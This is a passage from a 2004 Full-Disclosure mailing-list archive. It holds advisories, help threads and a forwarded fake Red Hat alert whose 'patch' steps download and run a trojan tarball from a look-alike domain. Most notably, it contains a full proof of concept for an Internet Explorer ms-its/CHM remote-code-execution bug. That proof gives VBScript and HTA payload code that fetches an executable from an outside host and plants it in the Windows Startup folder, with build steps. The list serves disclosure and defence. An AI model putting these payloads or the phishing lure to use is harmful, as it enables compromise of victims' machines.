> > prime p, I can factor it completely extremely quickly:
> >
> > p = 1 * p
> >
> > There are no other factors; this *is* the prime factorization. :) Bill
>
> Oh no, the whole security of computing has just fallen over, since you've shown that primes don't exist. What next, proving that black is white and getting run over on a zebra crossing?
>
> A prime is defined as being divisible by itself and 1 only, so for the purpose of the definition, 1 is not a factor.

<flame>
I was trying to give you the benefit of the doubt in my explanation,
but your response makes it clear that you're not thinking straight. By
your (almost correct) definition of prime, the factorization is
trivial! And yes, 1 is a factor. If you can break the prime into ANY
other factors, then it's NOT a prime.

You're talking about solving a problem that DOESN'T EXIST BY
DEFINITION. Re-read my response -- this time without being stupid --
and you'll see that I was trying to explain to you that the problem is
the general factoring of large numbers (into primes for what should be
obvious reasons). This is NOT the same as factoring large primes as
that's a solved problem. If this is still difficult to understand, any
handy grade-school maths book should provide additional explanation.
Testing for primality, which is a related but different problem, is
solved, but proving that a number is composite is unfortunately not
the same as knowing its factors.
</flame>

As to the question of whether this is a solved problem: we may have to
agree to disagree; if it were the NSA, given their past interactions
with the crypto community, I think it likely that they'd have over
time moved to another type of cryptography. BTW, brute forcing a key
does not break the system -- and as others have shown in this thread,
it's impossible to precompute all the keys unless you've broken every
single PRNG out there, and that's even less likely.

--
Kyle Maxwell
[krmaxwellgmail.com]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Vincent Archer (vardeny-all.com)
Date: Mon Oct 25 2004 - 04:01:53 CDT

On Sun, Oct 24, 2004 at 07:51:09PM -0400, Harry Hoffman wrote:
> haha, that's pretty funny. If they were going to do something like that
> it should have at least been in a rpm format.

Considering you can put an executable script inside, if I remember right.

> I'm hoping that this doesn't need to be said but if neither
> "yum check-update || up2date -l" report anything then chances are there
> are no "Official Fedora Updates"
>
> --Harry
>
>
>
> Hugo van der Kooij wrote:
> >-----BEGIN PGP SIGNED MESSAGE-----
> >
> >Be advised.
> >
> >The message below is currently going around on internet. Being unsinged
> >was the fist obvious issue. Not pointing to RPM updates, being in a
> >different format and such were among the other reasong to suspect it.
> >
> >Message was send from 'University of Texas at Arlington'.
> >
> >I am sure none of you should be fooled by such a message but other might
> >be.
> >
> >And while it lasts you may want to get the file for your own educational
> >purposes.
> >
> >Hugo.
> >- ---------- Forwarded message ----------
> >Date: Sun, 24 Oct 2004 17:22:20 -0500
> >From: RedHat Security Team <securityredhat.com>
> >To: *****************
> >Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
> >
> >
> >[logo_rh_home.png]
> >
> >Original issue date: October 20, 2004
> >Last revised: October 20, 2004
> >Source: RedHat
> >
> >A complete revision history is at the end of this file.
> >
> >Dear RedHat user,
> >
> >Redhat found a vulnerability in fileutils (ls and mkdir), that could
> >allow a remote attacker to execute arbitrary code with root privileges.
> >Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
> >RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
> >known that *BSD and Solaris platforms are NOT affected.
> >
> >The RedHat Security Team strongly advises you to immediately apply the
> >fileutils-1.0.6 patch. This is a critical-critical update that you must
> >make by following these steps:
> >
> > * First download the patch from the Security RedHat mirror: wget
> > www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
> > * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
> > * cd fileutils-1.0.6.patch
> > * make
> > * ./inst
> >
> >Again, please apply this patch as soon as possible or you risk your
> >system and others` to be compromised.
> >
> >Thank you for your prompt attention to this serious matter,
> >
> >RedHat Security Team.
> >
> >Copyright (C) 2004 Red Hat, Inc. All rights reserved.
> >
> >
> >-----BEGIN PGP SIGNATURE-----
> >Version: GnuPG v1.2.3 (GNU/Linux)
> >
> >iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7
> >OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo
> >H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL
> >fcdKycT5D9E=
> >=/nEk
> >-----END PGP SIGNATURE-----
> >
> >_______________________________________________
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

--
Vincent ARCHER
varcherdenyall.com

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Help, possible rootkit

From: Harry de Grote (rik.bobbaerscc.kuleuven.ac.be)
Date: Mon Oct 25 2004 - 03:58:33 CDT

Op Sunday 24 October 2004 15:59, Ali Campbell sgreifde:
> BillyBob wrote:
> > Any more suggestions ?
>
> I have seen something similar to this behaviour caused by a flaky power
> connector in a Si3112 mirrored RAID array.

or it's highly possible that your windows is just unstable :)

(which is true in most cases)

--
harry
aka Rik Bobbaers

K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
Rik.Bobbaerscc.kuleuven.ac.be -=- http://harry.ulyssis.org

"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Help, possible rootkit

From: Alan Melia (Melmac) (alanmemelmac.co.uk)
Date: Mon Oct 25 2004 - 04:59:04 CDT

Sorry but something MUST show up. Enable 'Context Switch Delta' and I/O
stuff. Then inspect the process/thread with the highest Context Switch.

The most probable cause if it shows up against system is some faulty
hardware generating high hardware interrupts. You do not have any evidence
that a rootkit is involved. IMHO never overlook the obvious.

Alan

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBob
Sent: 23 October 2004 21:30
To: Alan Melia (Melmac); 'Full Disclosure'
Subject: Re: [Full-Disclosure] Help, possible rootkit

I have ran Process Explorer, Code Stuff Starter but nothing shows up in the
list as using this 25-30% of my CYP. I also updated and ran PestPatrol,
NortonAV, etc but nothing is detected which is why I think I have a rootkit
that has patched the kernel and therefore not allowing any of these programs
to detect it.

Anything else ?

----- Original Message -----
From: "Alan Melia (Melmac)" <alanmemelmac.co.uk>
To: "'BillyBob'" <billybobknobhotmail.com>; "'Full Disclosure'"
<full-disclosurelists.netsys.com>
Sent: Saturday, October 23, 2004 4:47 PM
Subject: RE: [Full-Disclosure] Help, possible rootkit

> First check to see what processes are running. TaskList is built in
> but I would recommend.
> http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
>
> Get to know your machine and what processes are running normally.
> With 25-30% CPU it should stick out like a sore thumb.
>
> Oh yeah don't run as admin (see )http://blogs.msdn.com/aaron_margosis.
>
> Alan
>
>
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBob
> Sent: 23 October 2004 17:05
> To: Full Disclosure
> Subject: [Full-Disclosure] Help, possible rootkit
>
> I have noticed that my XP system is behaving like I have a rootkit.
>
> - My mouse is jumpy (it freezes for a second when I move it around the
> desktop) and the minimized Taskmanager in the systray shows I have
> around
> 25 - 30 % usage, but when I open it, there is no process listed using
> this much.
> - I did a netstat, fport, openports and none of these show that I have
> any odd ports open or any connections established.
> - even when I disconnect from the Internet these symptoms do not stop.
They
> stop if I reboot, but then start again.
>
> I have ran VICE, Klister, PatchFinder and RkDetect from rootkit.com
> and
they
> could not find anything.
>
> Any more suggestions ?
> Any more rootkit finding tools for Windows ?
>
> Thanks
> Bill
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Feher Tamas (etomcatfreemail.hu)
Date: Mon Oct 25 2004 - 05:18:24 CDT

Hello,

Read these:

http://www.redhat.com/security/
http://www.f-secure.com/weblog/#00000323

>The message below is currently going around on internet.
>Being unsinged was the fist obvious issue.

Do you really expect a singing security alert from RedHat? I
think the all singing, all dancing security bulletins are a
M$ specialty.

Regards: Tamas Feher.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Mozilla Thunderbird 0.8 / Firefox 0.9.3 temporary files (local)

From: Daniel Veditz (dveditzcruzio.com)
Date: Mon Oct 25 2004 - 06:08:53 CDT

This was fixed Friday (bug 251297) and the fix will be in next versions of
Mozilla products.

It looks like the bug was introduced last March which would make Mozilla 1.7
and Firefox 0.9 and later vulnerable, Mozilla 1.6 and Firefox 0.8 and
earlier OK. Thunderbird has been vulnerable from version 0.6 on.

-Dan Veditz

Martin wrote:
>
> Mozilla Thunderbird 0.8 / Firefox 0.9.3 temporary files (local)
>
> Martin (broadcastptraced.net)
>
> -------------------
> Program Description
> -------------------
>
> "Thunderbird, our latest email program, includes intelligent spam
> filters, spell-checking, security, customization, and newsgroups
> support."
>
> www.mozilla.org
>
> -------------------
> Problem Description
> -------------------
>
> When opening an attachment, or a link included in an email, Thunderbird
> prompts the user with a dialog box, giving the choice to "Save to Disk"
> or to "Open with" <default program>.
>
> For example, we receive a PDF document attached, and on the Attachments
> section, we choose "Open".
>
> broadcast:/tmp$ ls -l *.pdf
> -rw------- 1 broadcast broadcast 2002560 2004-10-24 18:38 wskbq43m.pdf
>
> While the dialog box is still open, the file permissions are OK, and the
> filename is random (except for the extension).
> If we choose to save it to disk, and check /tmp again:
>
> broadcast:/tmp$ ls -l *.pdf
> ls: *.pdf: No such file or directory
>
> Great, it's gone. Now let's choose to open it with the default viewer
> (in my case, xpdf).
> Again, while the dialog box is open, there are no apparent problems.
>
> broadcast:/tmp$ ls -l *.pdf
> -rw------- 1 broadcast broadcast 2002560 2004-10-24 18:42 hp1h30si.pd
>
> But after choosing to open it with xpdf:
>
> broadcast:/tmp$ ls -l *.pdf
> -rw-r--r-- 1 broadcast broadcast 2002560 2004-10-24 18:42 programming.pdf
>
> The file becomes world readable, until the user closes xpdf, or whatever
> application he chose to read the attachment.
> Also, the filename becomes predictable, but if the filename already
> exists on /tmp, Thunderbird will choose a similar filename, and won't
> work on the existing one.
>
> This exact issue affects Mozilla Firefox 0.9.3. I haven't tested
> older/newer versions, and all of this was tested under Debian Unstable.
>
> A copy of this advisory and future updates on this issue may be found on:
> http://broadcast.ptraced.net/advisories/008-firefox.thunderbird.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] re: How to Break Windows XP SP2 + Internet Explorer 6 SP2

From: Michael Evanchik (MikeMichaelEvanchik.com)
Date: Sun Oct 24 2004 - 22:35:42 CDT

I have created a PoC for this http://www.michaelevanchik.com/kara/scrolll/notagain.txt

and for those of you scared to click links these days , here is the contents

Microsoft Internet Explorer ms-its scheme/CHM remote code execution

Oct, 24 2004

Vulnerable
----------
- Microsoft Internet Explorer 6.0 (lower was not tested)
- Microsoft Windows XP Pro
- Microsoft Windows XP Home
- Microsoft Windows 2003 Server Enterprise

not tested if vulnerable
------------------------
- Microsoft Windows 98
- Microsoft Internet Explorer 5.x

Not Vulnerable
--------------
- Microsoft Windows 2000
- Microsoft Windows 2000 Server

Severity
---------
Critical - Remote code execution, little user intervention

In English
----------
   You can run executable code with a series of html codes on a XP system. Its getting harder and harder these days so be ready for a long confusing paper. I am posting this proof of concept because as most of us know Microsoft will dismiss the last advisory (from http-equiv) and not provide us with patches for months and maybe years.

Tech Stuff and Explanation
--------------------------
http://www.michaelevanchik.com/kara/scrolll/files.zip <-- download all files here

1. Create a image file with the following source code that http-equiv gave us into a comment section on a image file. I used Photoshop in the file menu > file info > comment field. From there I saved the file as a jpeg file and then renamed it to malwarez6.mcb

Here is the code http-equiv gave us, i just changed it around to inject the hta file into start up instead.

<script language="vbs">
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://arite.zapto.org;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\real scheduler.hta", adPersistXML
rs.close
conn.close
</script>

There is one thing you need to know about this code. Oddly "select * from foobar.txt" not only runs a GET command for "foobar.txt" on the web server, it also logs in anonymous to a FTP server on the same host. If your server does not allow both, the vulnerability will not work.

2. foobar.txt was the most difficult part of for me. From the information http-equiv gave us, it seems this vulnerability could have been dismissed since you could not fit enough scriptable code into the hta file without the script compiler erroring due to binary asci code messing up the vbscript. What I uncovered was this text file needed to be in a comma delimited format. Not only that each side of each line of code needed to be padded with a dummy variable to keep the code "alive" so it would not error. Notice the variable "crap" and the first and last lines where also dummies which the code would not have worked without. HTA files are still a BIG whole for microsoft. All the patching they have done to exploits, and the creation of xp service pack 2 was gods sent, but yet HTA files do not apply to ANY of these new features. So I ended up putting an old and easy exe running exploit inside this hta file.

foobar.txt
-----------------------------------------
"meaning less shit i had to put here"
"<script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""http://hometown.aol.com/mcbain/calc.exe"",False : crap="""
""" : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup\RealAudio.exe"",2 : crap="""
"""</script> crap="""
--------------end foobar.txt--------------------

3. In index.html notice the following key code:

<img id="dyn" src="malwarez6.mcb" border="0">

According to http-equiv's (malware.com) post he was using a file with no extension. This did not work for me on IIS server so I used an extension that was not used (.mcb). From there in IIS management console I added this mime type manually (.mcb text/html) entry. This image now gets by microsoft's patch of not allowing executable content to be "draggable". Microsoft seems to check ( no matter what extension of the file u use, or content type your http server sends) the file internally to see if it is not an executable file.

4. create a file cigar.hhk. The code in this file is self explanatory

5. create frame.html. Most somewhat self explanatory, though note the following code..

 <OBJECT style="height:650" style="width:250"id="hhctrl" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"codebase="hhctrl.ocx#Version=5,2,3790,1194"width=7% height=7% style="position:absolute;top:140;left:72;z-index:100;">
    <PARAM name="Command" value="Index">
    <PARAM name="Item1" value="cigar.hhk">click me
</OBJECT>

I could not get this object auto clicked with hhctrl.click() unfortunately, for now this is the only user intervention part. But when a user click this object, it runs the html file in local zone, bypassing XP Service pack 2 for the second time in this exploit.

6. Upload hhtctrl.ocx for the computers that don't happen to have this control. All XP's seem to have this by default, some win2k3's do not

Proof of Concept?
----------------
- http://www.michaelevanchik.com/kara/scrolll/index.html

- scroll down on this webpage and click the display button as directed.

- you will then notice a hta file in your start > programs > start up > real sceduler.hta

- from here when that is run you will get Real Audio.exe, alternatively the hta file is basically remote execution at that point anyway.

Vendor Recommendations
---------------------
- Microsoft needs to apply XP Service Pack 2's local zone exploit lockdown to .HTA files as well

- Microsoft should disable adodb.recordsets .save method for writing to hard drives.

- As always Microsoft should pay BETTER people to test their software instead of rewards for
  virus writers

- Microsoft should not dismiss any vulnerabilities as "not a vulnerability itself" problems
  since if combined with other "not a vulnerability itself" bugs lead to THE PROBLEM

Temp Fix
-------------
- Disable hta files.
- Disable scripting in Internet Explorer
- Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox www.mozilla.org)

Credit
------
Http equiv - without him, i wouldn't have a clue

mikx - http://www.mikx.de/scrollbar/ for his genius killer scrollbars!

Greets
------
- slacker my other brain
- illwill at illmob.org
- abe,rain and dolan

Contact
-------
MikeMichaelEvanchik.com
http://www.MichaelEvanchik.com - me

http://Software.High-Pow-er.com - Need a professional programmer?
http://www.High-Pow-er.com - Other, Security, Consulting

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] RE: Full-Disclosure digest

From: Todd Towles (toddtowlesbrookshires.com)
Date: Mon Oct 25 2004 - 07:58:57 CDT

Maybe because they are e-mail borne and if you haven't noticed, you post
on here via e-mail? This list is open, therefore as long as people don't
fix their computers, you will get viruses. Welcome to FD =)

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> digitalchaos
> Sent: Friday, September 03, 2004 4:27 AM
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] RE: Full-Disclosure digest
>
> Why are there virus being transmitted through this newsgroup??
>
> OUTPUT FROM MCAFEE:
> ****************** McAfee VirusScan ************************
> ******* Alert generated at: Thu, 02 Sep 2004 13:15:00 -0500 *********
> *********************************************************************
>
> McAfee VirusScan has detected a potential threat in this
> e-mail sent by full-disclosure-requestlists.netsys.com.
> The following actions were attempted on each suspicious part.
> We strongly recommend that you report this virus-related
> activity to full-disclosure-requestlists.netsys.com.
>
>
> The attachment "E-mail body" is infected with the
> W32/Bagle.aaMM Virus(es).
> This attachment has been quarantined.
>
>
> This is not the only message I have received like this
>
> Some were infected by NETSKY, various zip/pif virus, and such.
>
>
>
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> full-disclosure-requestlists.netsys.com
> Sent: Friday, October 22, 2004 9:24 AM
> To: full-disclosurelists.netsys.com
> Subject: Full-Disclosure digest, Vol 1 #1996 - 8 msgs
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200410-24 ] MIT krb5: Insecure temporary file use in send-pr.sh

From: Thierry Carrez (koongentoo.org)
Date: Mon Oct 25 2004 - 08:09:14 CDT

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: MIT krb5: Insecure temporary file use in send-pr.sh
      Date: October 25, 2004
      Bugs: #66359
        ID: 200410-24

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The send-pr.sh script, included in the mit-krb5 package, is vulnerable
to symlink attacks, potentially allowing a local user to overwrite
arbitrary files with the rights of the user running the utility.

Background
==========

MIT krb5 is the free implementation of the Kerberos network
authentication protocol written by the Massachusetts Institute of
Technology.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 app-crypt/mit-krb5 <= 1.3.5 >= 1.3.5-r1
                                                          *>= 1.3.4-r1

Description
===========

The send-pr.sh script creates temporary files in world-writeable
directories with predictable names.

Impact
======

A local attacker could create symbolic links in the temporary files
directory, pointing to a valid file somewhere on the filesystem. When
send-pr.sh is called, this would result in the file being overwritten
with the rights of the user running the utility, which could be the
root user.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All MIT krb5 users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=app-crypt/mit-krb5-1.3.4-r1"
    # emerge ">=app-crypt/mit-krb5-1.3.4-r1"

References
==========

  [ 1 ] CAN-2004-0971
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0971

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-24.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] RE: Full-Disclosure digest

From: steve menard (smenardnbnet.nb.ca)
Date: Mon Oct 25 2004 - 09:05:53 CDT

Todd Towles wrote:

>Maybe because they are e-mail borne and if you haven't noticed, you post
>on here via e-mail? This list is open, therefore as long as people don't
>fix their computers, you will get viruses. Welcome to FD =)
>
>
>
>>-----Original Message-----
>>From: full-disclosure-adminlists.netsys.com
>>[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
>>digitalchaos
>>Sent: Friday, September 03, 2004 4:27 AM
>>To: full-disclosurelists.netsys.com
>>Subject: [Full-Disclosure] RE: Full-Disclosure digest
>>
>>Why are there virus being transmitted through this newsgroup??
>>
>>OUTPUT FROM MCAFEE:
>>****************** McAfee VirusScan ************************
>>******* Alert generated at: Thu, 02 Sep 2004 13:15:00 -0500 *********
>>*********************************************************************
>>
>>
>>

Since I don't get the digest and rarely see the viruses. . . . .
unless your ISP filters; remember you should implement security in
layers, possibly consider it the first line of defense [each should have
protection as well.] these virii will get through. (my ISP does
[they are using brightstor; -not a testimonial-; based on the few
ripped-apart messages that do get through] it can be really tough to
get some example code through sometimes_not_ And I have told the only
prefs available to me & through help desk not to scan my mail ; but it
does... dang corporate policy for major Canadian telephone company;....
Imagine now; they still want me to pay an additional $5.00 /month to get
me a desktop client, but I don't get the viruses because they already
filter ;-p )

Likewise I know I cannot trust this account for receiving any files
because they are intercepted
each and everyone ; some still get through ; user [admin or not] beware

;-0

steve

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Q: Linux Command Line Encryption

From: Denis Dimick (denisdimick.net)
Date: Mon Oct 25 2004 - 10:33:41 CDT

Use GPG and keychain to store the key.

On Sun, 24 Oct 2004, Bruno Wolff III wrote:

> On Fri, Oct 22, 2004 at 17:48:26 +0000,
> Ali Campbell <fdisclosurealicampbell.org.uk> wrote:
> >
> > I need a Linux utility which I can use to encrypt a single gzipped file
> > via the command line. Obviously something open source would be
> > preferable. I'm not really interested in setting up a whole suite of
> > stuff with keyfiles and so on, and I don't need a public/private key
> > setup, just something quick and dirty with a single secret key for
> > encryption and decryption which is nevertheless reasonably strong.
>
> If you are only automating encryption and not decryption and not signing
> for integrity, you should probably reconsider using public keys since
> that way you don't have to make a password available to your script.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200410-25 ] Netatalk: Insecure tempfile handling in etc2ps.sh

From: Luke Macken (lewkgentoo.org)
Date: Mon Oct 25 2004 - 11:06:19 CDT

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-25
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Netatalk: Insecure tempfile handling in etc2ps.sh
      Date: October 25, 2004
      Bugs: #66370
        ID: 200410-25

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The etc2ps.sh script, included in the Netatalk package, is vulnerable
to symlink attacks, potentially allowing a local user to overwrite
arbitrary files with the rights of the user running the utility.

Background
==========

Netatalk is a kernel level implementation of the AppleTalk Protocol
Suite, which allows Unix hosts to act as file, print, and time servers
for Apple computers. It includes several script utilities, including
etc2ps.sh.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 net-fs/netatalk < 1.6.4-r1 >= 1.6.4-r1

Description
===========

The etc2ps.sh script creates temporary files in world-writeable
directories with predictable names.

Impact
======

A local attacker could create symbolic links in the temporary files
directory, pointing to a valid file somewhere on the filesystem. When
etc2ps.sh is executed, this would result in the file being overwritten
with the rights of the user running the utility, which could be the
root user.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Netatalk users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=net-fs/netatalk-1.6.4-r1"
    # emerge ">=net-fs/netatalk-1.6.4-r1"

References
==========

  [ 1 ] CAN-2004-0974
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0974

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-25.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBBfSR6Rsm3eDkOu7kRAo0QAJ4rIKpgy4yPW+GrKEQdsmHjUV4STACgjxuD
80kGW7+ZZfujlES+lB90EfU=
=hWRS
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Rendering binary file as HTML makes Mozilla Firefox stop responding or crash

From: Peter Kruse (krusekrusesecurity.dk)
Date: Mon Oct 25 2004 - 11:30:37 CDT

CSIS Security Advisory [CSIS2004-5):

Rendering binary file as HTML makes Mozilla Firefox stop responding or crash

Date Published: 10.25.2004

Summary
Mozilla Firefox, Web-browser built for 2004, advanced e-mail and newsgroup
client, IRC chat client, and HTML editing made simple. The Mozilla Firefox
shippes with several bugs, making it possible to crash the browser, eat up
virtual memory, simply by hosting a binary renamed as html, on a remote
website.

Vulnerability Class
The browser should remain responsive while displaying large files. Instead
it crashes and hangs and feeds on virtual memory which could cause the
operating system to become unstable.

Details
Internet Explorer, and other browsers, verifies the content of filetypes
before opening in the browser. Based on the content of the file, it decides
what application should be used to open/view the content of the file. This
is, by design, not the case with Mozilla based browsers. A malicious website
can host a large chunck of data, spoofed as a html file that Mozilla will
display within the browser window. Thereby effectively causing a crash on
systems visiting the website.

You can choose any file from your harddisk larger than 5MB, rename it as a
html file, upload it to a remote website, or simply open it directly from
your local harddrive. The result is the same: Mozilla will stop responding,
showing a lot of binary garbage (clearly understandable), before the user is
forced to either end the application or reboot the system.

In several test scenarios the system force feed all virtual memory causing
the system to become unstable. However, this all depends on the size of the
file viewed by the browser. To avoid the user from being suspicious while
the file loads and garbage is showed in the browser window you can format
the website in such a way, that binary code won't show. This way the browser
will show a blank page until it crashes and the system becomes unstable.
When viewed, the browser will load the binary without the users knowledge.
The fact that this bug can be trigged by sending the same file with 1024
ASCII characters pre-pended makes exploitation trivial.

Impact
Low-Medium: This is a remote DoS in Mozilla Firefox. There are several other
ways to crash the browser.

This behavior was confirmed with Mozilla/5.0 (Windows; U; Windows NT 5.1;
rv:1.7.3) Gecko/20040913 Firefox/0.10, but my guess is that all versions of
Mozilla introduce the problem.

Solution
Awaiting fix

Affected Products
Mozilla/5.0 Gecko/20040913 Firefox/0.10 and prior

----
Med venlig hilsen // Kind regards

Peter Kruse,
Security- and virusanalyst,
CSIS, Combined Services & Integrated Solutions
http://www.csis.dk

PGP fingerprint
79FD 0648 158E 6B9E 236F CFDA 7C58 64D6 BE83 FA60

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200410-26 ] socat: Format string vulnerability

From: Luke Macken (lewkgentoo.org)
Date: Mon Oct 25 2004 - 11:10:05 CDT

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-26
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: socat: Format string vulnerability
      Date: October 25, 2004
      Bugs: #68547
        ID: 200410-26

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

socat contains a format string vulnerability that can potentially lead
to remote or local execution of arbitrary code with the privileges of
the socat process.

Background
==========

socat is a multipurpose bidirectional relay, similar to netcat.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 net-misc/socat < 1.4.0.3 >= 1.4.0.3

Description
===========

